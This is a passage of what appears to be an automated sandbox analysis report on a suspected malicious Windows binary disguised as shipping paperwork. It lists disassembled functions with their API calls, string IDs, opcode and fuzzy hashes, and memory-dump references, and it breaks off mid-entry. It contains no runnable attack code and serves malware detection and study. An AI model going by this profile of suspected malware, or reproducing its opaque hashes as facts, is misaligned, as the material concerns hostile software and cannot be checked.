                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: SendString$_memmove
                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                • API String ID: 2279737902-1007645807
                                                                • Opcode ID: 40b8ec0ec92aaac68251f60be38b2656645039b2145c72d025b1626124f6cde6
                                                                • Instruction ID: 9e7bf4f5e6e86608f06437b9ede930c94fced3379887ad341d67ede720d00dd2
                                                                • Opcode Fuzzy Hash: 40b8ec0ec92aaac68251f60be38b2656645039b2145c72d025b1626124f6cde6
                                                                • Instruction Fuzzy Hash: 77118661950159B9DB25B6F6CC4AEFFBB7CEBD5B44F400419B405920E1EEA00D44CA61
                                                                Function 009946B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                • String ID: 0.0.0.0
                                                                • API String ID: 208665112-3771769585
                                                                • Opcode ID: e7415edc99fbd2425289ba8688fed86bfd9dc574ba7a98732db4e8cf2d271344
                                                                • Instruction ID: d87deeda83b3e9c87ad75a2879795d809d0707b1d2febc70f0052fe36ab41e60
                                                                • Opcode Fuzzy Hash: e7415edc99fbd2425289ba8688fed86bfd9dc574ba7a98732db4e8cf2d271344
                                                                • Instruction Fuzzy Hash: AD1105325041086BDF11AB759C4AEDA77BCEB86722F0002B6F849960A1EF708A868B50
                                                                Function 00994F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • timeGetTime.WINMM ref: 00994F7A
                                                                  • Part of subcall function 0095049F: timeGetTime.WINMM(?,75C0B400,00940E7B), ref: 009504A3
                                                                • Sleep.KERNEL32(0000000A), ref: 00994FA6
                                                                • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00994FCA
                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00994FEC
                                                                • SetActiveWindow.USER32 ref: 0099500B
                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00995019
                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00995038
                                                                • Sleep.KERNEL32(000000FA), ref: 00995043
                                                                • IsWindow.USER32 ref: 0099504F
                                                                • EndDialog.USER32(00000000), ref: 00995060
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                • String ID: BUTTON
                                                                • API String ID: 1194449130-3405671355
                                                                • Opcode ID: 56471999cce843940ff45e057f91a5e36b21f228c74ecb88ab7b99525d392e9a
                                                                • Instruction ID: d3e3b04f3df68629906bf19df1be4b22d3899aac765522f256b9a9af9e7242d4
                                                                • Opcode Fuzzy Hash: 56471999cce843940ff45e057f91a5e36b21f228c74ecb88ab7b99525d392e9a
                                                                • Instruction Fuzzy Hash: E421C07022C609BFEB225F28EE99F363B6DEB48755F051228F509921B1DB718D00FB61
                                                                Function 0099D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • CoInitialize.OLE32(00000000), ref: 0099D5EA
                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0099D67D
                                                                • SHGetDesktopFolder.SHELL32(?), ref: 0099D691
                                                                • CoCreateInstance.OLE32(009C2D7C,00000000,00000001,009E8C1C,?), ref: 0099D6DD
                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0099D74C
                                                                • CoTaskMemFree.OLE32(?,?), ref: 0099D7A4
                                                                • _memset.LIBCMT ref: 0099D7E1
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0099D81D
                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0099D840
                                                                • CoTaskMemFree.OLE32(00000000), ref: 0099D847
                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0099D87E
                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 0099D880
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                • String ID:
                                                                • API String ID: 1246142700-0
                                                                • Opcode ID: c14a6f152ecf44c42f9a8ee518a7262fd2cbac4e730708ddf803b7ec6882f026
                                                                • Instruction ID: 0a6e7bdece49f3a5ab741ae903f5ee054d8602a525b006987f35c2527b6180ca
                                                                • Opcode Fuzzy Hash: c14a6f152ecf44c42f9a8ee518a7262fd2cbac4e730708ddf803b7ec6882f026
                                                                • Instruction Fuzzy Hash: B3B1DD75A00109AFDB04DFA8C894EAEBBB9EF89314F148559F909DB261DB30ED45CF50
                                                                Function 0098C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,00000001), ref: 0098C283
                                                                • GetWindowRect.USER32(00000000,?), ref: 0098C295
                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0098C2F3
                                                                • GetDlgItem.USER32(?,00000002), ref: 0098C2FE
                                                                • GetWindowRect.USER32(00000000,?), ref: 0098C310
                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0098C364
                                                                • GetDlgItem.USER32(?,000003E9), ref: 0098C372
                                                                • GetWindowRect.USER32(00000000,?), ref: 0098C383
                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0098C3C6
                                                                • GetDlgItem.USER32(?,000003EA), ref: 0098C3D4
                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0098C3F1
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0098C3FE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                • String ID:
                                                                • API String ID: 3096461208-0
                                                                • Opcode ID: 0c8351ed4fc6670e681baf79b169a2d98e784954ba66c77734fe1a60e9a92196
                                                                • Instruction ID: b22a6afe2f7a80e53d08412b8b5577bf6786bb2ee5fbd338d0b8824015147980
                                                                • Opcode Fuzzy Hash: 0c8351ed4fc6670e681baf79b169a2d98e784954ba66c77734fe1a60e9a92196
                                                                • Instruction Fuzzy Hash: CD5132B1B10205AFDF18DFA9DD99A6EBBB9EB88711F14822DF915D7290D7709D008B10
                                                                Function 0093201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00931B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00932036,?,00000000,?,?,?,?,009316CB,00000000,?), ref: 00931B9A
                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009320D3
                                                                • KillTimer.USER32(-00000001,?,?,?,?,009316CB,00000000,?,?,00931AE2,?,?), ref: 0093216E
                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0096BCA6
                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009316CB,00000000,?,?,00931AE2,?,?), ref: 0096BCD7
                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009316CB,00000000,?,?,00931AE2,?,?), ref: 0096BCEE
                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009316CB,00000000,?,?,00931AE2,?,?), ref: 0096BD0A
                                                                • DeleteObject.GDI32(00000000), ref: 0096BD1C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                • String ID:
                                                                • API String ID: 641708696-0
                                                                • Opcode ID: 2dc1020e3750d812127a26ed40a6c1bf070159f51d13e78375309eef16b86691
                                                                • Instruction ID: 92cbc413cc9b24851b71b17eac51887ea49daa85bcfe26497a281aa0328891dc
                                                                • Opcode Fuzzy Hash: 2dc1020e3750d812127a26ed40a6c1bf070159f51d13e78375309eef16b86691
                                                                • Instruction Fuzzy Hash: F3617C31128A10DFCB39AF14DE58B3AB7F5FF40312F108529E6428A5B0D774A885EF91
                                                                Function 009321A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 009325DB: GetWindowLongW.USER32(?,000000EB), ref: 009325EC
                                                                • GetSysColor.USER32(0000000F), ref: 009321D3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ColorLongWindow
                                                                • String ID:
                                                                • API String ID: 259745315-0
                                                                • Opcode ID: e7dfe6bf59dca7ffa974093d6618488b07b402deb581561e10d02a3b78bbde86
                                                                • Instruction ID: 75c0ab4d520edf0d3e1e2a288e58ee3d08962d3bdac5ed82bae420e77adeed89
                                                                • Opcode Fuzzy Hash: e7dfe6bf59dca7ffa974093d6618488b07b402deb581561e10d02a3b78bbde86
                                                                • Instruction Fuzzy Hash: 00418231108640EBDB295F68DC98BBA3B69EB06331F144365FE758A1E5D7318C82EF61
                                                                Function 0099A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharLowerBuffW.USER32(?,?,009BF910), ref: 0099A90B
                                                                • GetDriveTypeW.KERNEL32(00000061,009E89A0,00000061), ref: 0099A9D5
                                                                • _wcscpy.LIBCMT ref: 0099A9FF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                • API String ID: 2820617543-1000479233
                                                                • Opcode ID: 90d01ec88cdbabd2b7b5854951a91da1cf1ab3d4903182a739d2b472e80b9346
                                                                • Instruction ID: b439eee030f88e01051bd6aa9f68b1b9bcd69e54c0b4fd98ec9aae44a8df76db
                                                                • Opcode Fuzzy Hash: 90d01ec88cdbabd2b7b5854951a91da1cf1ab3d4903182a739d2b472e80b9346
                                                                • Instruction Fuzzy Hash: 57518A31508301ABCB20EF19C992BAFB7A9FFC4304F154829F895572A2DB719D09CB93
                                                                Function 00939837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __i64tow__itow__swprintf
                                                                • String ID: %.15g$0x%p$False$True
                                                                • API String ID: 421087845-2263619337
                                                                • Opcode ID: 719e0c4ae9663bbb159ab77713469ef829235d453bef25351a6b9479f7e51a43
                                                                • Instruction ID: 19a0a743bf3bc82889c2fb2c154fd99fa64adb28923021c4b5410bf51e567cdb
                                                                • Opcode Fuzzy Hash: 719e0c4ae9663bbb159ab77713469ef829235d453bef25351a6b9479f7e51a43
                                                                • Instruction Fuzzy Hash: D941C571604205AFEB24DF75D852B7673E8EF85300F20486EF94ADB291EA759D058F10
                                                                Function 009B7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 009B716A
                                                                • CreateMenu.USER32 ref: 009B7185
                                                                • SetMenu.USER32(?,00000000), ref: 009B7194
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009B7221
                                                                • IsMenu.USER32(?), ref: 009B7237
                                                                • CreatePopupMenu.USER32 ref: 009B7241
                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009B726E
                                                                • DrawMenuBar.USER32 ref: 009B7276
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                • String ID: 0$F
                                                                • API String ID: 176399719-3044882817
                                                                • Opcode ID: 5d0a8e30273f5517df9a0a2aad573aef2996f702eb7442810803e87fb327f30b
                                                                • Instruction ID: aaff73384cbd3ad9a3f5f6886e07a6004bb98eff9da220c77575cd5cc9c07c7f
                                                                • Opcode Fuzzy Hash: 5d0a8e30273f5517df9a0a2aad573aef2996f702eb7442810803e87fb327f30b
                                                                • Instruction Fuzzy Hash: 12416B74A15205EFDB20DFA4DA84EEABBB9FF48360F140228F91597361D771A910DFA0
                                                                Function 009B74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009B755E
                                                                • CreateCompatibleDC.GDI32(00000000), ref: 009B7565
                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009B7578
                                                                • SelectObject.GDI32(00000000,00000000), ref: 009B7580
                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 009B758B
                                                                • DeleteDC.GDI32(00000000), ref: 009B7594
                                                                • GetWindowLongW.USER32(?,000000EC), ref: 009B759E
                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009B75B2
                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009B75BE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                • String ID: static
                                                                • API String ID: 2559357485-2160076837
                                                                • Opcode ID: cc0980b1a978f56ead92da5baf88f613475b240f4b47d8be6c540f7a3814cfa4
                                                                • Instruction ID: 7c15da7982893179607fd5716014b2a328bda64d21b7ebd521ae82478a25e193
                                                                • Opcode Fuzzy Hash: cc0980b1a978f56ead92da5baf88f613475b240f4b47d8be6c540f7a3814cfa4
                                                                • Instruction Fuzzy Hash: B2316C72118218BBDF219FB4DD18FEA7B69EF49730F110325FA15A61A0C771D811EBA4
                                                                Function 00956E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00956E3E
                                                                  • Part of subcall function 00958B28: __getptd_noexit.LIBCMT ref: 00958B28
                                                                • __gmtime64_s.LIBCMT ref: 00956ED7
                                                                • __gmtime64_s.LIBCMT ref: 00956F0D
                                                                • __gmtime64_s.LIBCMT ref: 00956F2A
                                                                • __allrem.LIBCMT ref: 00956F80
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00956F9C
                                                                • __allrem.LIBCMT ref: 00956FB3
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00956FD1
                                                                • __allrem.LIBCMT ref: 00956FE8
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00957006
                                                                • __invoke_watson.LIBCMT ref: 00957077
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                • String ID:
                                                                • API String ID: 384356119-0
                                                                • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                • Instruction ID: 3de9200694381e81a065ca460c2ae758d45ca6b61aefb27a87be144ebf540290
                                                                • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                • Instruction Fuzzy Hash: DF711872A00716ABD714EEBADC42B5AB3F8AF45725F108229FC14E72C1E770DE088790
                                                                Function 00992527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00992542
                                                                • GetMenuItemInfoW.USER32(009F5890,000000FF,00000000,00000030), ref: 009925A3
                                                                • SetMenuItemInfoW.USER32(009F5890,00000004,00000000,00000030), ref: 009925D9
                                                                • Sleep.KERNEL32(000001F4), ref: 009925EB
                                                                • GetMenuItemCount.USER32(?), ref: 0099262F
                                                                • GetMenuItemID.USER32(?,00000000), ref: 0099264B
                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00992675
                                                                • GetMenuItemID.USER32(?,?), ref: 009926BA
                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00992700
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00992714
                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00992735
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                • String ID:
                                                                • API String ID: 4176008265-0
                                                                • Opcode ID: c415faba97eb15b6fac1b0c1f015312b9d52747f6d8f555a62c4a559a6ac9291
                                                                • Instruction ID: f23ff3e937df01b57587f21405a2b88bec76ab0f7fd719d06c2be7d4ac67a40f
                                                                • Opcode Fuzzy Hash: c415faba97eb15b6fac1b0c1f015312b9d52747f6d8f555a62c4a559a6ac9291
                                                                • Instruction Fuzzy Hash: 2961AAB0914249BFDF21CFA8DD88EBE7BB9EB45344F14056AF842A7290D731AD05DB21
                                                                Function 009B6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 009B6FA5
                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 009B6FA8
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009B6FCC
                                                                • _memset.LIBCMT ref: 009B6FDD
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009B6FEF
                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009B7067
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$LongWindow_memset
                                                                • String ID:
                                                                • API String ID: 830647256-0
                                                                • Opcode ID: 763d9dc3f7fbda89fac4009e0de8dd94c215f6c7e3b7be31d658704123ff6360
                                                                • Instruction ID: ec989e07bcf58df36b253ec3f4a34d1cce71b68f26ad3482f41555fe06a6064c
                                                                • Opcode Fuzzy Hash: 763d9dc3f7fbda89fac4009e0de8dd94c215f6c7e3b7be31d658704123ff6360
